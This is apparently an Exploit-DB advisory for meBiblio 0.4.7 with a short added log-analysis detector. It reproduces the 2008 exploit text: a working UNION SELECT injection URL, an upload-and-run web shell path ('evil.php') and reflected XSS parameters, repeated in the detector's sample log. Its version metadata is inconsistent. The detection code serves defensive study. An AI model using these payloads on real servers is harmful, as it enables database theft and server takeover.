Vendor: meBiblio
By: CWH Underground
CVSS: 8.8 (HIGH)
Vulnerability type: SQL Injection / Arbitrary File Upload / XSS
CWE: 89, 95, 79
Product Name: meBiblio
Affected Version From: 2000.4.7
Affected Version To: 2000.4.7
Patch Exists: NO
Related CWE: N/A
CPE: a:mebiblio:mebiblio:0.4.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

meBiblio 0.4.7 Remote SQL Injection/ Arbitrary File Upload Exploit / XSS Vulnerability

meBiblio 0.4.7 is vulnerable to SQL injection, arbitrary file upload and cross-site scripting (XSS). An attacker can exploit the SQL injection by sending a crafted query through an unsanitized request parameter, can upload an arbitrary file (including server-side script) to the application and then execute it, and can inject JavaScript that the application reflects back to its users.

Mitigation:

Input validation should be applied to every user-supplied parameter to prevent SQL injection, arbitrary file upload and XSS. The application should also be configured so that only trusted, authenticated users can upload files.
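On the detection side, the endpoints and parameters listed in the Exploit-DB advisory below are specific enough to flag in web-server access logs. The following is an added example, not code from the original page or from meBiblio: the regexes, finding labels, the `/biblio` path prefix and the sample log lines are all constructed for illustration, and the "web shell suspected" rule simply pairs a POST to the uploader with a later successful request for a .php file under files/.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Endpoints and parameters named in the advisory; the [path] prefix is unknown, so paths match by suffix.
SQLI_ENDPOINT, SQLI_PARAM = "/admin/journal_change_mask.inc.php", "JID"
XSS_PARAMS = {"/dbadd.inc.php": "sql", "/add_journal_mask.inc.php": "InsertJournal",
              "/insert_mask.inc.php": "InsertBibliography", "/search_mask.inc.php": "LabelYear"}
UPLOADER, FILES_DIR = "/upload/uploader.html", "/files/"
SQLI_RE = re.compile(r"\bunion\b.*\bselect\b|['\"]|--|/\*", re.I)
XSS_RE = re.compile(r"<|javascript:|\bon\w+\s*=", re.I)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')  # common log format

def classify(line):
    """Return (client, finding) pairs for one access-log line; [] if nothing matched."""
    if not (m := LOG_RE.match(line)):
        return []
    client, method, target, status = m.groups()
    url = urlsplit(target)
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values once
    findings = []
    if url.path.endswith(SQLI_ENDPOINT):  # JID is a record id: a bare integer is the only benign shape
        for v in params.get(SQLI_PARAM, []):
            if not v.isdigit() or SQLI_RE.search(v):
                findings.append("sqli:" + SQLI_PARAM)
    for endpoint, param in XSS_PARAMS.items():
        if url.path.endswith(endpoint):
            findings += ["xss:" + param for v in params.get(param, []) if XSS_RE.search(v)]
    if method == "POST" and url.path.endswith(UPLOADER):
        findings.append("upload:uploader.html")
    if FILES_DIR in url.path and url.path.endswith(".php") and status == "200":
        findings.append("exec:files-php")  # PHP served from the upload directory
    return [(client, f) for f in findings]

def triage(log_text):
    """Group findings per client; upload followed by PHP execution is flagged as a suspected web shell."""
    report = {}
    for line in log_text.splitlines():
        for client, finding in classify(line):
            report.setdefault(client, []).append(finding)
    for findings in report.values():
        if "upload:uploader.html" in findings and "exec:files-php" in findings:
            findings.append("webshell-suspected")
    return report
# Constructed sample log, not real traffic; /biblio stands in for the advisory's [path].
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jun/2008:10:00:01 +0000] "GET /biblio/admin/journal_change_mask.inc.php?JID=1%20union%20select%201,PACS_description,1,1%20FROM%20pacs%20where%20PACS_ID=2 HTTP/1.1" 200 4311
203.0.113.5 - - [01/Jun/2008:10:00:09 +0000] "POST /biblio/upload/uploader.html HTTP/1.1" 200 512
203.0.113.5 - - [01/Jun/2008:10:00:12 +0000] "GET /biblio/files/evil.php HTTP/1.1" 200 77
198.51.100.7 - - [01/Jun/2008:10:01:00 +0000] "GET /biblio/search_mask.inc.php?LabelYear=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048
198.51.100.7 - - [01/Jun/2008:10:01:30 +0000] "GET /biblio/admin/journal_change_mask.inc.php?JID=17 HTTP/1.1" 200 3990
"""
```

Running `triage(SAMPLE_LOG)` reports the injection, the upload and the web shell hit for the first client and only the reflected-XSS attempt for the second; the benign `JID=17` request produces no finding.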

Exploit-DB raw data:

========================================================================================
 meBiblio 0.4.7 Remote SQL Injection/ Arbitrary File Upload Exploit / XSS Vulnerability
========================================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 1 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : meBiblio
 VERSION     : 0.4.7 (Latest Version)
 VENDOR      : http://mebiblio.sourceforge.net/ 
 DOWNLOAD    : http://downloads.sourceforge.net/mebiblio
#####################################################

---SQL Injection Exploit---

http://[target]/[path]/admin/journal_change_mask.inc.php?JID=1%20union%20select%201,PACS_description,1,1%20FROM%20pacs%20where%20PACS_ID=2

** You will find PACS_description in the Journal Long Name box **


---Arbitrary File Upload Exploit---

[The files directory must exist]

Upload Path: http://[target]/[path]/upload/uploader.html

Shell Script: http://[target]/[path]/files/evil.php


---Multiple Remote XSS Exploit---

[+]dbadd.inc.php
[+]add_journal_mask.inc.php
[+]insert_mask.inc.php
[+]search_mask.inc.php

Example:
     
http://[target]/[path]/dbadd.inc.php?sql=<XSS>
http://[target]/[path]/add_journal_mask.inc.php?InsertJournal=<XSS>
http://[target]/[path]/insert_mask.inc.php?InsertBibliography=<XSS>
http://[target]/[path]/search_mask.inc.php?LabelYear=<XSS>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-01]